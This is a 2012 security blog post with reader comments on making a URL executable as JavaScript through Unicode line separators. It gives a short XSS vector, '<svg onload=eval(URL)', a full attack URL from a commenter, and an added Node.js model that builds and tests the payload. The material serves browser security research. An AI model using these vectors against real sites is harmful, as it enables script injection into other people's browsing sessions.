Eval a url
Tuesday, 8 May 2012
You might have seen a blog post, or come to the conclusion yourself, that URLs are in fact valid JavaScript, such as:
http://thespanner.co.uk
(label) (comment)
That's weird and cool, but how do we execute JavaScript from the URL? Something like:
http://thespanner.co.uk\nalert(1)
(label) (comment) (newLine) (functionCall)
Trouble is, a new line isn't allowed inside the browser's URL bar. Or is it? ECMAScript treats the Unicode line separator (U+2028) and paragraph separator (U+2029) as line terminators, exactly like CR and LF: they end a // comment and, via automatic semicolon insertion, separate statements. Thankfully our friend IE lets you put these characters directly in the URL. Using them lets you create an eval'able URL: the URL parses as the label http: followed by a // comment that swallows everything up to the terminator, and whatever comes after the terminator is the statement that the label labels and that gets executed.
So now we don't need to do eval(location.hash.slice(1)); we can simply eval the whole URL with eval(URL), where URL resolves to document.URL through the inline event handler's scope chain (eval only compiles strings, so passing the location object itself would just return the object unchanged). 🙂 I found this while discussing with Mario and Yosuke Hasegawa what the shortest HTML-based XSS injection was. Using this technique it's probably 21 characters (without using Netscape 4):
<svg onload=eval(URL)
You of course must pass your JavaScript as a non-existent query parameter: an ampersand, then a raw U+2029 (rendered here as a line break), then the code. Everything before the terminator, including the injected svg tag itself, is part of the // comment, so only the code after it runs:
&
alert(1)
Update…
As Stefano Di Paola points out, putting the payload in the hash (fragment) lets you use this technique on Chrome and Opera too, since they keep such characters unencoded in the fragment part of the URL.
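The following is an added example, not code from the original post: a small Node.js model of what eval(URL) does with a URL that carries a raw line terminator, so the behaviour above can be checked outside a browser. The host name example.test, the input parameter name and the payloads are constructed for illustration; the assumption that Chrome, Opera and IE leave the fragment unencoded is taken from the comments on this post.

```javascript
// Added example, not code from the original post: a Node.js model of what
// eval(URL) does with a URL that carries a raw line terminator.  Host name,
// parameter name and payloads are constructed for illustration.

// ECMAScript LineTerminator characters: LF, CR, LS (U+2028), PS (U+2029).
// A // comment runs to the first of these, so a URL only executes the text
// after a raw terminator; a percent-encoded one is ordinary comment text.
const LINE_TERMINATOR = /[\n\r\u2028\u2029]/;

// Split a URL into the part the engine parses as `http: //comment` and the
// statements after the first raw terminator (empty string if there is none).
function splitEvalableUrl(url) {
  const i = url.search(LINE_TERMINATOR);
  if (i === -1) return { comment: url, payload: '' };
  return { comment: url.slice(0, i), payload: url.slice(i + 1) };
}

// Compile and run the URL as a script, the way eval(URL) would in the page.
// alert() is replaced by a recorder so the calls can be inspected afterwards.
function runUrlAsJs(url) {
  const calls = [];
  const alert = (msg) => { calls.push(String(msg)); };
  let error = null;
  try {
    new Function('alert', url)(alert);
  } catch (e) {
    // A URL with nothing after the comment is a label with no statement to
    // label; whether the parser rejects that or not, nothing gets executed.
    error = e.name;
  }
  return { calls, error };
}

// Assemble the vector from the post: <svg onload=eval(URL) injected into a
// query parameter, and the payload after a raw U+2029 in the fragment
// (which, per the comments, Chrome, Opera and IE did not percent-encode).
function buildAttackUrl(base, payload) {
  return base + '?input=<svg onload=eval(URL)#&\u2029' + payload;
}

// The same URL with the terminator percent-encoded, as a browser that
// encodes the fragment (or a server log) would show it.  No code runs.
function buildEncodedUrl(base, payload) {
  return base + '?input=<svg onload=eval(URL)#&%E2%80%A9' + payload;
}

// Caveat on the shorthand eval(location): eval() only compiles strings and
// returns any other value unchanged, so the string form (document.URL, which
// an inline handler reaches as URL, or location.href) is what must be passed.
function evalLeavesObjectsUnchanged(url) {
  const loc = { href: url, toString() { return url; } };
  return (0, eval)(loc) === loc;
}

// Stand-alone demonstration.
function demo() {
  const base = 'http://example.test/';
  const attack = buildAttackUrl(base, "alert('I win!')");
  console.log(splitEvalableUrl(attack).payload);
  console.log(runUrlAsJs(attack).calls);
  console.log(runUrlAsJs(buildEncodedUrl(base, "alert('I win!')")).calls);
  console.log(evalLeavesObjectsUnchanged(base));
}
demo();
```

Run it with node; the raw-terminator URL records one alert call with 'I win!', the percent-encoded variant records none, and the object passed to eval comes back untouched, which is why the vector has to use the string form of the URL.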
No. 1 — May 8th, 2012 at 11:25 am
very nice Gareth!
About the update:
according to:
http://code.google.com/p/domxsswiki/wiki/LocationSources
Chrome, Opera and IE's URL object see unencoded chars > 127 when in the hash part, so the new vector:
location.href="http://challenge.hackvertor.co.uk/?challenge=1&input=<svg%20onload=eval(URL)#&\u2029alert('I win!')";
will work on IE, Chrome and Opera.
No. 2 — May 8th, 2012 at 11:36 am
Very nice 🙂 Shame about Firefox, hmmm, can we make it work there too?